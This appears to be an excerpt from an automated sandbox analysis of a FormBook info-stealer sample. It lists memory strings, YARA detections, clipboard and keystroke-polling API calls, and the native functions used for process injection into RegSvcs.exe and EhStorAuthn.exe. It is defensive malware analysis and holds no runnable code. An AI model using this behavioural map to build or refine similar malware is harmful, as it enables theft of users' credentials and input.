            Source: EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
            Source: EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00DDF45C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00DDF6C7
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDF45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,8_2_00DDF45C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCA54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,8_2_00DCA54A
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DF9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00DF9ED5

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042C353 NtClose,15_2_0042C353
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422B60 NtClose,LdrInitializeThunk,15_2_01422B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_01422DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_01422C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014235C0 NtCreateMutant,LdrInitializeThunk,15_2_014235C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01424340 NtSetContextThread,15_2_01424340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01424650 NtSuspendThread,15_2_01424650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BE0 NtQueryValueKey,15_2_01422BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BF0 NtAllocateVirtualMemory,15_2_01422BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422B80 NtQueryInformationFile,15_2_01422B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422BA0 NtEnumerateValueKey,15_2_01422BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AD0 NtReadFile,15_2_01422AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AF0 NtWriteFile,15_2_01422AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422AB0 NtWaitForSingleObject,15_2_01422AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D00 NtSetInformationFile,15_2_01422D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D10 NtMapViewOfSection,15_2_01422D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422D30 NtUnmapViewOfSection,15_2_01422D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DD0 NtDelayExecution,15_2_01422DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422DB0 NtEnumerateKey,15_2_01422DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C60 NtCreateKey,15_2_01422C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422C00 NtQueryInformationProcess,15_2_01422C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CC0 NtQueryVirtualMemory,15_2_01422CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CF0 NtOpenProcess,15_2_01422CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422CA0 NtQueryInformationToken,15_2_01422CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F60 NtCreateProcessEx,15_2_01422F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F30 NtCreateSection,15_2_01422F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FE0 NtCreateFile,15_2_01422FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422F90 NtProtectVirtualMemory,15_2_01422F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FA0 NtQuerySection,15_2_01422FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422FB0 NtResumeThread,15_2_01422FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422E30 NtWriteVirtualMemory,15_2_01422E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422EE0 NtQueueApcThread,15_2_01422EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422E80 NtReadVirtualMemory,15_2_01422E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422EA0 NtAdjustPrivilegesToken,15_2_01422EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423010 NtOpenDirectoryObject,15_2_01423010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423090 NtSetValueKey,15_2_01423090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014239B0 NtGetContextThread,15_2_014239B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423D70 NtOpenThread,15_2_01423D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01423D10 NtOpenProcessToken,15_2_01423D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04614650 NtSuspendThread,LdrInitializeThunk,22_2_04614650
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04614340 NtSetContextThread,LdrInitializeThunk,22_2_04614340
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C60 NtCreateKey,LdrInitializeThunk,22_2_04612C60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C70 NtFreeVirtualMemory,LdrInitializeThunk,22_2_04612C70
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CA0 NtQueryInformationToken,LdrInitializeThunk,22_2_04612CA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D30 NtUnmapViewOfSection,LdrInitializeThunk,22_2_04612D30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D10 NtMapViewOfSection,LdrInitializeThunk,22_2_04612D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DF0 NtQuerySystemInformation,LdrInitializeThunk,22_2_04612DF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DD0 NtDelayExecution,LdrInitializeThunk,22_2_04612DD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612EE0 NtQueueApcThread,LdrInitializeThunk,22_2_04612EE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612E80 NtReadVirtualMemory,LdrInitializeThunk,22_2_04612E80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F30 NtCreateSection,LdrInitializeThunk,22_2_04612F30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FE0 NtCreateFile,LdrInitializeThunk,22_2_04612FE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FB0 NtResumeThread,LdrInitializeThunk,22_2_04612FB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AF0 NtWriteFile,LdrInitializeThunk,22_2_04612AF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AD0 NtReadFile,LdrInitializeThunk,22_2_04612AD0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612B60 NtClose,LdrInitializeThunk,22_2_04612B60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BE0 NtQueryValueKey,LdrInitializeThunk,22_2_04612BE0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BF0 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_04612BF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612BA0 NtEnumerateValueKey,LdrInitializeThunk,22_2_04612BA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046135C0 NtCreateMutant,LdrInitializeThunk,22_2_046135C0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_046139B0 NtGetContextThread,LdrInitializeThunk,22_2_046139B0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612C00 NtQueryInformationProcess,22_2_04612C00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CF0 NtOpenProcess,22_2_04612CF0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612CC0 NtQueryVirtualMemory,22_2_04612CC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612D00 NtSetInformationFile,22_2_04612D00
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612DB0 NtEnumerateKey,22_2_04612DB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612E30 NtWriteVirtualMemory,22_2_04612E30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612EA0 NtAdjustPrivilegesToken,22_2_04612EA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F60 NtCreateProcessEx,22_2_04612F60
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612FA0 NtQuerySection,22_2_04612FA0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612F90 NtProtectVirtualMemory,22_2_04612F90
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612AB0 NtWaitForSingleObject,22_2_04612AB0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04612B80 NtQueryInformationFile,22_2_04612B80
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613010 NtOpenDirectoryObject,22_2_04613010
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613090 NtSetValueKey,22_2_04613090
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613D70 NtOpenThread,22_2_04613D70
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_04613D10 NtOpenProcessToken,22_2_04613D10
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308E30 NtReadFile,22_2_02308E30
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308F20 NtDeleteFile,22_2_02308F20
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308FC0 NtClose,22_2_02308FC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02308CC0 NtCreateFile,22_2_02308CC0
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_02309130 NtAllocateVirtualMemory,22_2_02309130
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E69B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E69B5C
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00DC1A91
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCF122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_00DCF122
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7355D0_2_00E7355D
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7B76F0_2_00E7B76F
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E6BF3D0_2_00E6BF3D
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8C0D60_2_00E8C0D6
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7A0080_2_00E7A008
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E892D00_2_00E892D0
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7C27F0_2_00E7C27F
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7A2220_2_00E7A222
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E752140_2_00E75214
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E943600_2_00E94360
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E746CF0_2_00E746CF
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E986D20_2_00E986D2
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E648AA0_2_00E648AA
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E9480E0_2_00E9480E
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E65AFE0_2_00E65AFE
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7ABC80_2_00E7ABC8
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E67CBA0_2_00E67CBA
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E7BC050_2_00E7BC05
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E63D9D0_2_00E63D9D
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E74D320_2_00E74D32
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E8BEA70_2_00E8BEA7
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E65F390_2_00E65F39
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E75F0B0_2_00E75F0B
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A37C188_3_01A37C18
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A390988_3_01A39098
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A374638_3_01A37463
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A371688_3_01A37168
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A374688_3_01A37468
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A380C18_3_01A380C1
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D7E0BE8_2_00D7E0BE
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D880378_2_00D88037
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D6E1A08_2_00D6E1A0
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D9A28E8_2_00D9A28E
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D6225D8_2_00D6225D
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D7C59E8_2_00D7C59E
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DEC7A38_2_00DEC7A3
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D9E89F8_2_00D9E89F
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD291A8_2_00DD291A
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D96AFB8_2_00D96AFB
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DC8B278_2_00DC8B27
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D8CE308_2_00D8CE30
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DF51D28_2_00DF51D2
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D971698_2_00D97169
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D692408_2_00D69240
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D694998_2_00D69499
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D817248_2_00D81724
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D87BAB8_2_00D87BAB
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D69B608_2_00D69B60
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D87DDA8_2_00D87DDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0041836315_2_00418363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004030F015_2_004030F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004011C015_2_004011C0
